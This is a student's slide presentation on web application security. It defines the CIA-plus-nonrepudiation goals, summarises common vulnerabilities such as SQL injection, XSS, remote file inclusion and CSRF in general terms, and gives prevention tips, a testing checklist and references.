SECURITY OF

WEB APPLICATION
GUIDED BY: DR. RACHITA MISHRA
SUBMITTED BY: RISHABH RAJ
REGD NO: 1601227401
BRANCH: IT
 WHAT IS WEB
APPLICATION SECURITY

Web application security is a branch of information

security that deals specifically with security of websites,
web applications and web services. At a high level, web
application security draws on the principles of
application security but applies them specifically to
internet and web systems.
 AIM OF WEB SECURITY

• Confidentiality: States that the sensitive data stored in the Web application should
not be exposed under any circumstances.

• Integrity: States that the data contained in the Web application is consistent and is
not modified by an unauthorized user.

• Availability: States that the Web application should be accessible to the genuine
user within a specified period of time depending on the request.

• Nonrepudiation: States that the genuine user cannot deny modifying the data
contained in the Web application and that the Web application can prove its
identity to the genuine user.
WEB APPLICATION VULNERABILITIES

• SQL Injection
• Broken Authentication
• Sensitive Data Exposure
• Remote File Inclusion
• Cross-site Request Forgery (CSRF)
• Security Misconfiguration
• Cross-Site Scripting (XSS)
• Insecure Deserialization
• Using Components with Known Vulnerabilities
• Insufficient Logging and Monitoring
WEB VULNERABILITIES
 SOME WEB APPLICATION
VULNERABILITIES
• SQL Injection – Occurs when a perpetrator uses malicious SQL code to manipulate a backend
database so it reveals information. Consequences include the unauthorized viewing of lists,
deletion of tables and unauthorized administrative access.

• Cross-site Scripting (XSS) – XSS is an injection attack targeting users in order to access accounts,
activate Trojans or modify page content. Stored XSS occurs when malicious code is injected directly
into an application. Reflected XSS takes place when malicious script is reflected off of an application
onto a user’s browser.

• Remote File Inclusion – A hacker uses this type of attack to remotely inject a file onto a web
application server. This can result in the execution of malicious scripts or code within the
application, as well as data theft or manipulation.

• Cross-site Request Forgery (CSRF) – An attack that could result in an unsolicited transfer of funds,
changed passwords or data theft. It’s caused when a malicious web application makes a user’s
browser perform an unwanted action in a site to which a user is logged on.
 VULNERABILITIES PREVENTION

• Keep software up to date

• Watch out for SQL Injection
• Protect against XSS attacks
• Beware of error messages
• Validate on both sides
• Check your passwords
• Avoid file uploads
• Use HTTPS
 VULNERABILITIES PREVENTION

From XSS Attack : An intelligent Web Application Firewall (WAF) can shield these
vulnerabilities, working in conjunction with the behavioural firewall, blocking
sophisticated and dangerous attacks.

From DDoS Attack: A reliable and well-reviewed DDoS protection tool is the best
defence against DDos Attacks

From SQL Injection: In order to keep your databases secure you should practice
regular auditing and remediation of your application to ensure that any vulnerability
are discovered and dealt with as quickly as possible.
 WEB APPLICATION
SECURITY CHECKLIST

• Information Gathering – Manually review the application, identifying entry points and
client-side codes. Classify third-party hosted content.

• Authorization – Test the application for path traversals; vertical and horizontal access
control issues; missing authorization and insecure, direct object references.

• Cryptography – Secure all data transmissions. Has specific data been encrypted? Have
weak algorithms been used? Do randomness errors exist?

• Denial of service – Improve an application’s resilience against denial of service threats by

testing for anti-automation, account lockout, HTTP protocol DoS and SQL wildcard DoS. This
doesn’t cover protection from high-volume DoS and DDoS attacks, which are best
countered by a combination of filtering solutions and scalable resources
 CONCLUSION

Secure web application development should be enhanced by

applying security checkpoints and techniques at early stages of
development as well as throughout the software development
lifecycle. Special emphasis should be applied to the coding phase of
development. Security mechanisms that should be used include,
threat modeling, risk analysis, static analysis, digital signature,
among other
 REFRENCES

• https://en.wikipedia.org/wiki/Web_application_security

• "2012 Trends Report: Application Security Risks". Cenzic, Inc. 11 March 2012.

• "Testing and Comparing Web Vulnerability Scanning Tools for SQL Injection and
XSS Attacks". Fonseca, J.; Vieira, M.; Madeira, H., Dependable Computing, IEEE.
Dec 2007.

• https://www.techopedia.com/definition/24377/web-application-security

• https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sh
eet
THANKYOU